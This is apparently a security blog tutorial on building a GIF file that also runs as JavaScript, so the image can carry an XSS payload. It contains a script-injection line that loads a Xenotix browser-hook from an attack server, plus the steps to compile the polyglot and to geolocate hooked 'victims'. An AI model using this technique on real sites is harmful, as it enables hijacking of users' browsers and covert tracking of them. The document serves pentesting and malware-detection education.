Let's see how we can build a GIF file that can serve JS.
Download the YASM compiler from http://yasm.tortall.net/Download.html
and this asm file: https://gist.github.com/ajinabraham/f2a057fb1930f94886a3
Your PoC JS code can be just "alert(0)" or for Red Team Pentesting I would suggest you to use OWASP Xenotix XSS Exploit Framework (as I wrote it) or Beef (an alternative). In this post i will be using Xenotix.
Download Latest Xenotix from https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing
First of all run Xenotix and Start Server from Settings -> Configure Server
s = document.createElement("script"); s.src = "http://127.0.0.1:5058/xook.js"; //Xenotix xook URL document.body.appendChild(s);
In our case we need to dynamically add the Xenotix xook to the page that loads the GIF file as JS so that we can perform other advanced attacks from that xooked (hooked) page. Here is the gifjs.asm after adding the JS code
Now lets compile the file.
yasm gifjs.asm -o img.gif
Let's test our Bi-format valid GIF file.
Let's create an HTML file with the following source.
Open the HTML file in a browser and you will see an image in the browser. Press F12 and go to your console.
<img src="img.gif"> <script src="img.gif"></script>
Now you can see a message in the console (for Chrome),
Resource interpreted as Script but transferred with MIME type image/gif: "file:///C:/Users/Ajin/Desktop/jspics/img.gif".
This just give us a hint that the page had requested and interpreted a GIF as JS. This is useful for malware analysts to identify malwares embedded in images. Malwares use this technique to deliver exploit codes and bypass detection. Well back to our scenario. Now the page is xooked and you can use Xenotix to fire up some XSS Exploits.
Let's use the IP2Gelocation Module, Go back to Xenotix and run the IP2Geolocation module from Information Gathering -> Victim Fingerprinting -> IP2Geolocation. Click on Fingerprint and you will get something like this.
Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security including 5 years of Security Research. He is passionate about developing new and unique security tools. Some of his contributions to Hacker's arsenal include Mobile Security Framework (MobSF), nodejsscan, OWASP Xenotix, etc. Areas of interest include runtime security instrumentation, offensive security, web and mobile application security, code and architectural reviews, cloud-native runtime security, security tool development, security automation, breaking and fixing security products, reverse engineering, and exploit development.